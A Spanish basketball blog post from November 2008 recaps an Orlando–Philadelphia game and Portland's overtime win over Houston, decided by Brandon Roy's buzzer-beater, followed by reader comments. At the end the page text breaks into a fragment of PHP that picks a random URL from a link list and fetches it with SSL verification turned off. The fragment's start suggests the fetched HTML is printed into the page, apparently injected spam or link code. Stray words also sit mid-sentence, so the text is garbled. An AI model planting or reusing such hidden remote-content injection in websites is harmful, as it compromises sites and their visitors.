La crónica (06/11/08): Un milagro, dos milagros, tres milagros

07 de November de 2008 por MagicJohnson32

royartest

Por Telekoman & MagicJohnson32

Tras la maratoniana jornada del miércoles, el jueves nos ha dejado sólo un par de partidos, aunque muy interesantes y de los que seguramente podamos obtener algunas conclusiones de principios de temporada.

En el primero de ellos, Orlando consiguió, pese a los problemas de faltas de Dwight Howard, ganar a unos Sixers que no consiguen encontrar el camino que muchos, incluidos nosotros, apuntaban. Los Magic ganaron cómodamente por 98 a 88. Turkoglu, Lewis y sobre todo Nelson cargaron con éxito con el juego exterior mientras que Tony Battie suplía a Howard lo mejor que podía contra las torres de Philadelphia. Brand, Dalembert e incluso Iguodala se pusieron las botas y consiguieron 37 rebotes, 11 de ellos ofensivos, ante la ausencia durante muchos minutos del pívot titular de Orlando. Claro que esta cifra tiene su reverso tenebroso: los 11 rebotes ofensivos vienen como consecuencia de los muchísimos fallos en el tiro exterior. 17 tiros fallados por André Miller, 11 por Thaddeus Young y 8 por Iguodala son demasiados. En definitiva, Orlando consigue su tercera victoria que les sirve para no perder la estela de Atlanta en la división SouthEast y Philadelphia encaja su cuarta derrota para confirmar que no consigue arrancar.

Mucho más emocionante resultó el milagroso triunfo de Portland ante los Rockets por 101 a 99 con prórroga incluida. El partido se decidió en un final histórico: en los 2 últimos segundos de partido se anotaron 8 puntos.

La secuencia de acontecimientos fue la siguiente:

00:00:01.9 Outlaw atrapa un rebote defensivo y cede el balón a Roy con menos de 10 segundos por jugar y  empate a 96. Roy cruza la cancha, quiebra a su defensor y anota una preciosa suspensión desde 5 metros. Marcador: Rockets 96, Blazers 98.

00:00:00.8 Alston saca de banda, Yao recibe a 4 metros del aro defendido por Przybilla, se da media vuelta, lanza y anota a la vez que recibe una falta de Roy, en un grave error por parte del joven escolta. Yao anota también el tiro libre. Marcador: Rockets 99, Blazers 98.

00:00:00.0 Roy escapa de la vigilancia de McGrady, recibe a más de 9 metros del aro y realiza un lanzamiento con un arco muy pronunciado que entra con el tiempo ya agotado. Marcador: Rockets 99, Blazers 101.

He aquí el vídeo de los hechos:

Los mejores del partido fueron McGrady por parte de Houston, con 30 puntos, 7 rebotes y 8 asistencias, y Aldridge para Portland con 27 puntos, 9 rebotes y 3 tapones. Pese a la presencia de Yao, fue Portland el que dominó los tableros con un destacado Travis Outlaw, que realizó un excelente encuentro con 14 puntos y 13 rebotes. En cuanto a la presencia española, Rudy continuó con su buen momento, participando en los momentos decisivos del encuentro y consiguiendo 15 puntos, con 3 triples de 5 intentos. Sergio rudyartestRodríguez contó con más minutos que de costumbre, 11, que aprovechó para repartir 6 asistencias y capturar 3 rebotes, aunque falló los 3 tiros que intentó.

Los premios del día:

MVP: Lo repartimos entre Aldridge, por sus 27 puntos y 9 rebotes, y Roy con 17 puntos pero sobre todo por los 5 que anotó en los últimos dos segundos de partido.

El rookie: El debutante más destacado de los dos encuentros fue Rudy, que sigue contando y mucho para su entrenador como la tercera alternativa en ataque tras sus estrellas Roy y Aldridge.

La sorpresa: Tras unos primeros encuentros decepcionantes, Andre Iguodala consiguió sobreponerse haciendo un encuentro bastante completo con 16 puntos, 11 rebotes y 8 asistencias que no valieron para ganar el partido. Otro resucitado fue Jameer Nelson, que hacía mucho que no jugaba como ayer. También puede considerarse un sorpresa el hecho de que Artest sólo tirara 9 veces a canasta.

El mayor esfuerzo en vano: Sin duda, los 30 puntos de McGrady en su mejor encuentro hasta la fecha esta temporada.

Una conclusión para cada uno de los cuatro equipos que jugaron anoche:

– Andre Miller debería darse cuenta de que no trae nada positivo para su equipo que él sea el jugador que más lance, y más cuando hace cosas como el 7 de 24 de anoche. Ya le sucedió en la derrota ante Atlanta, cuando hizo 5 de 18. O Miller mejora bastante o sé de cierto base extremeño que jugará su primer All Star Game. Por no hablar de las opciones de Playoffs de los Sixers, claro.

– McGrady ha jugado dos partidos realmente buenos hasta la fecha, y ambos han sido derrotas. En ocasiones, y esto viene dwightsixersde lejos, parece que su juego y el de los Rockets vayan por caminos diferentes. Si por cualquier motivo el nuevo proyecto de Houston no funciona, no nos sorprendería que resurgiesen los rumores sobre un posible traspaso de T-Mac, que el año próximo se convertirá en expiring.

– Los Magic son más que Dwight Howard, aunque eso ya lo sabíamos. Sucede que con Howard en la pista, el equipo se limita demasiado a buscarlo, mientras que sin él se ven obligados a sacar todo su juego, como sucedió anoche cuando el pívot se vio muy pronto en el banquillo por problemas de faltas. Sería muy buena señal para las aspiraciones de Orlando que Howard sea con cierta frecuencia el 3º ó 4º anotador del equipo.

– El partido de ayer es un magnífico ejemplo de lo que suponen ahora mismo los Blazers: un grupo de jugadores prometedores e inexpertos, capaces de cometer errores de bulto (como la falta de Roy a Yao a menos de 1 segundo para el final y con su equipo 2 arriba) pero también de lograr genialidades y ganar partidos a cualquier equipo de la liga. Y todo esto, con Przybilla en el lugar de habría de estar ocupando Oden.

Comenta

8 comentarios a esta entrada

  1. Txusma dice:
    #1

    Le esta costando mucho a Philadelphia no? En breve deberan ser considerados como decepciones de la temporada.
    Y lo de Roy es IMPRESIONANTE. Ese ultimo tiro dsd 9 metros con una dinamica de lanzamiento perfecta es aparte de decisivo esteticamente precioso. Grande!

      Citar

  2. TheDeerHunter dice:
    #2

    Si hubiera derecho a veto en TJNBA lo ejercería contra la mención de Roy en la categoría de MVP de la jornada de anoche.
    El tipo es indiscutiblemente un grande de la liga ya mismo y sus dos últimos zarpazos del partido fueron genialidades absolutaas… pero alguien que sólo ha metido 17ptos con una prórroga en una serie de 6-18 y 5 pérdidas no puede decirse que haya hecho siquiera un buen partido.

    Por otro lado, rompiendo una lanza por los desheredados de TJNBA, la defensa de Artest sobre Roy al final del tiempo reglamentario magnífica y la canasta de T-Mac en la jugada de antes de “la secuencia de acontecimientos” increíble.
    De Yao no sé qué decir… le volvió a bajar la regla (y ya van dos seguidos) pero la última canasta que metió es tan genial como el triple de Roy (aunque sirviera de bastante menos)

    Me gustaría destacar el correcto partido de Sergio. Es difícil hacer tanto en tan poco tiempo. El problema es que parece dar lo mismo que juegue bien o mal. Eso sí… que afine la puntería, please.

    Con respecto a Sixers y Magic… Iguadala lanzó como el culo anoche también, más allá del resto de sus estadísticas. Ha empezado fatal aunque lo de ayer es un buen comienzo para su recuperación.
    Lo de Miller es consecuencia directa de lo nulos en ataque que están sus compañeros.

    Y lo de Howard… nulo desarrollo en su juego, de momento (aunque bueno, en su caso no es fácil llegar a un nivel superior al que está, que ya es muy alto) Esta es la causa de todo lo que decís.

      Citar

  3. TheDeerHunter dice:
    #3

    Ah, y Batum titular dos partidos seguidos ya…

    A la vuelta de Webster ¿será él o será Rudy quien pierda su posición?? (porque conociendo a McMillan, diría que es difícil que Webster se quede en segundo plano por muy bien que lo hagan los otros dos)

      Citar

  4. MagicJohnson32 dice:
    #4

    Roy no ha hecho buenos números, e incluso ha estado a punto de tirar el partido a la basura con su absurda falta a Yao, pero el tipo lo ha ganado con dos canastones. El segundo es brutal. Me recuerda, por cierto, a aquel triple de Kobe Bryant en la prórroga del último partido de la regular season 2003-2004 en esa misma pista, que sirvió a los Lakers para superar a los Kings en la clasificación y ganar la Pacific.

    Éste: http://www.youtube.com/watch?v=nH-0gLhqpJg

    No me refiero al primero para forzar la prórroga, sino al segundo para ganar el partido. Roy lanza desde más lejos (es tremendo hasta dónde se va a tirar), aunque Kobe lo hace en fade away y con Theo Ratliff encima (tanto que le hace falta, por cierto). Brutales ambos.

      Citar

  5. MagicJohnson32 dice:
    #5

    Por cierto, según el análisis de ESPN, Roy tardó 1.6 segundos en lanzar desde el momento que recibió. En el reloj quedaban 0.8, jojo.

      Citar

  6. Viva_Dirk dice:
    #6

    En que demonios piensa McGrady para dejar salir a Roy de esa manera tan sumamente fácil????? Roy mete un canastón tremendo pero es que no deberia haber podido tirar así.

    A los Sixers les cuesta porque a Andre Miller siempre le cuesta entrar en las temporadas.

      Citar

  7. Vicente_Pisha dice:
    #7

    Eso que comenta Magic del 1.6 segundos lo he pensado viendo el video. En realidad no son 0.8 lo que tiene para lanzar, sino los 0.8+ el tiempo de reacción del cronometrador que pone en marcha el reloj.

      Citar

  8. Elio dice:
    #8

    Increíble final. No ha ocurrido en partido de PlayOffs pero será recordado por mucho tiempo. Acojonante.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>